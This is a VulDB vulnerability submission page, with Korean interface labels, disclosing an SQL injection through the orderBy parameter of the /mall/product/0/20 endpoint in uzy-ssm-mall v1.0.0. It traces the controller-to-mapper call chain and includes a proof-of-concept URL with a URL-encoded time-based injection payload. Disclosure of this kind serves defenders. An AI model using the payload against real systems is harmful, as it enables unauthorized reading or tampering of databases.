제출 #549260: ghostxbh uzy-ssm-mall v1.0.0 SQL Injection정보

제목	ghostxbh uzy-ssm-mall v1.0.0 SQL Injection
설명	Vulnerability Description In the uzy-ssm-mall v1.0.0 version, the /mall/product/0/20 interface contains a high-risk SQL injection vulnerability. The root cause of this vulnerability lies in the code's failure to effectively filter data passed from the frontend, directly concatenating it into SQL statements. This allows attackers to manipulate database queries by constructing malicious inputs, potentially leading to the retrieval, modification, or deletion of sensitive information in the database. Vulnerability Location The vulnerability is located at the /mall/product/0/20 interface. The specific call sequence is: ProductMapper --> ProductServiceImpl --> ForeProductListController. Code Audit Process Vulnerability File Path / File Name: The vulnerability point is located in the order by statement, where the sorting field is passed from the frontend. Vulnerability Call Sequence: ProductMapper: The Mapper layer responsible for interacting with the database. ProductServiceImpl: The business logic processing layer, which calls the Mapper layer for database operations. ForeProductListController: The controller layer, which receives frontend requests and calls the Service layer for processing. Vulnerability Code Analysis: In ForeProductListController.java, the sorting field is directly passed from the frontend without any filtering or validation. This field is directly concatenated into the SQL statement, resulting in an SQL injection vulnerability. Vulnerability Exploitation: Attackers can manipulate the order by statement by constructing malicious inputs, thereby executing arbitrary SQL queries. POC http(s)://target-ip/mall/product/0/20?category_id=151&isDesc=true&orderBy=%28select%2Afrom%28select%2Bsleep%280%29union%2F%2A%2A%2Fselect%2B1%29a%29
원천	⚠️ https://wiki.shikangsi.com/post/share/ba8925f0-0480-4356-9b32-4543d0ea8671
사용자	XingYue_Mstir (UID 72225)
제출	2025. 04. 02. AM 11:56 (1 년도 ago)
모더레이션	2025. 04. 14. AM 12:36 (12 days later)
상태	수락
VulDB 항목	304600 [ghostxbh uzy-ssm-mall 1.0.0 /mall/product/0/20 ForeProductListController orderBy SQL 주입]
포인트들	20

◂ 이전 개요 다음 ▸

Interested in the pricing of exploits?

See the underground prices here!